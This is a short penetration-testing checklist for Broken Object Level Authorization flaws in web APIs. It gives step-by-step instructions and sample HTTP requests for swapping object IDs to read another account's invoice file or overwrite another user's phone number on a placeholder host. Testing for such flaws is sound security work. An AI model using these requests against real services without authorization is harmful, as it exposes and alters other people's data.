Broken Object Level Authorization

Check List

Create two accounts on the target (Account A = yours, Account B = second/test account)

Perform any action with Account A that returns or uses an object ID, Common places

Your profile → returns "id": 12345
Your orders → /api/orders/9876
Your files → /files/abc-xyz-111
Your settings → /api/v1/users/852

Collect every ID you see in responses (numeric, UUID, base64, hashed, username-based, etc.)

Switch to Account B (or log out completely) and repeat the exact same requests but replace the ID with the one from Account A

If you can view, modify, or delete Account A’s resource → BOLA confirmed

Intercept profile update request

PUT /api/users/1024 HTTP/1.1
Host: target.com
Authorization: Bearer user_token_1024
Content-Type: application/json

{"phone":"9999999999"}

Modify object ID

PUT /api/users/1025 HTTP/1.1
Host: target.com
Authorization: Bearer user_token_1024
Content-Type: application/json

{"phone":"8888888888"}

Forward the request

If another user’s profile is updated successfully, write-level object authorization is missing

If no ownership validation is enforced server-side, BOLA vulnerability is confirmed.

Access file endpoint

GET /api/files/INV-2024-001.pdf HTTP/1.1
Host: target.com
Authorization: Bearer token_userA

Modify file identifier

GET /api/files/INV-2024-002.pdf HTTP/1.1
Host: target.com
Authorization: Bearer token_userA

Send request

If unauthorized file belonging to another account is returned, object-level access control is missing

If file retrieval is based solely on predictable object keys, BOLA is confirmed

Last updated 1 month ago